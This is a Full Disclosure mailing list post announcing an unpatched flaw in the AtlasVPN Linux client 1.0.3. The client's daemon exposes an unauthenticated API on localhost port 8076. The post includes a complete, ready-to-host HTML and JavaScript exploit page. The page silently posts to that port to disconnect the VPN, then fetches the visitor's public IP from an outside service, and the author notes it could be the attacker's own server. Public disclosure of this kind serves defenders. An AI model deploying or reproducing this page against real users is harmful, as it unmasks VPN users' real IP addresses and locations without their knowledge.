Full Disclosure mailing list archives
AtlasVPN Linux Client 1.0.3 IP Leak Exploit
From: icudar via Fulldisclosure <fulldisclosure () seclists org>
Date: Fri, 01 Sep 2023 18:49:19 +0000
The following is my 0day. This code, when executed on any website, disconnects the AtlasVPN linux client and leaks the
users IP address. I am not yet aware of it being used in the wild. However, it shows that AtlasVPN does not take their
users safety serious, because their software security decisions suck so massively that its hard to believe this is a
bug rather than a backdoor. Nobody can be this incompetent. I tried to contact their support to get hold of a security
contact, a pgp key or any signs of a bug bounty programme. Nope. No answer.
Root Cause
The AtlasVPN Linux Client consists of two parts. A daemon (atlasvpnd) that manages the connections and a client
(atlasvpn) that the user controls to connect, disconnect and list services. The client does not connect via a local
socket or any other secure means but instead it opens an API on localhost on port 8076. It does not have ANY
authentication. This port can be accessed by ANY program running on the computer, including the browser. A malicious
javascript on ANY website can therefore craft a request to that port and disconnect the VPN. If it then runs another
request, this leaks the users home IP address to ANY website using the exploit code.
Exploit Code
The following code demonstrates the issue. It can be uploaded to any webserver. When the site is visited, AtlasVPN
disconnects and leaks the IP address. Not intended for illegal purposes.
<html>
<head>
<title>=[ atlasvpnd 1.0.3 remote disconnect exploit ]=</title>
</head>
<body>
<pre><code id="log">=[ atlasvpnd 1.0.3 remote disconnect exploit ]=
You should be running the atlasvpn linux client and be connected to a VPN.
Use <b>atlasvpn connect</b> to connect to a VPN server.
</code></pre>
<iframe id="hiddenFrame" name="hiddenFrame" style="display: none;"></iframe>
<form id="stopForm" action="http://127.0.0.1:8076/connection/stop"; method="post" target="hiddenFrame">
<button type="submit" style="display: none"></button>
</form>
<script>
window._currentIP = false;
// Run main exploit code
window.addEventListener('load', function () {
addIPToLog();
setTimeout(triggerFormSubmission, 1000);
setTimeout(addIPToLog, 3000);
});
// Blind CORS request to atlasvpnd to disconnect the VPN
function triggerFormSubmission() {
var logDiv = document.getElementById('log');
logDiv.innerHTML += "[-] Sending disconnect request to atlasvpnd...\n";
document.getElementById('stopForm').submit();
}
// Gets IP from ipfy API (this, of course, could be your server)
function addIPToLog() {
var logDiv = document.getElementById('log');
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://api.ipify.org?format=json', true);
xhr.onload = function () {
var ipAddress = window._currentIP;
if (xhr.status === 200) {
var response = JSON.parse(xhr.responseText);
ipAddress = response.ip;
logDiv.innerHTML += '[?] Current IP:' + ipAddress + "\n";
} else {
logDiv.innerHTML += '[-] Error fetching IP address.\n';
}
// Check if the IP changed. If yes: Success.
if (window._currentIP && window._currentIP != ipAddress) {
logDiv.innerHTML += "[+] Successfully disconnected VPN."
}
if (window._currentIP && window._currentIP == ipAddress) {
logDiv.innerHTML += "[-] Disconnect failed our you were not connected to the VPN in the first place."
}
// Save IP for next iteration.
window._currentIP = ipAddress;
};
xhr.send();
}
</script>
</body>
</html>
Greets
Fly out to a certain crafter of trashy maps and my favourite WoW NPC. I hope this makes it into the press. Peace out.Attachment:
publickey - icudar@proton.me - 0x662872F4.asc
Description:
Attachment:
signature.asc
Description: OpenPGP digital signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- AtlasVPN Linux Client 1.0.3 IP Leak Exploit icudar via Fulldisclosure (Sep 04)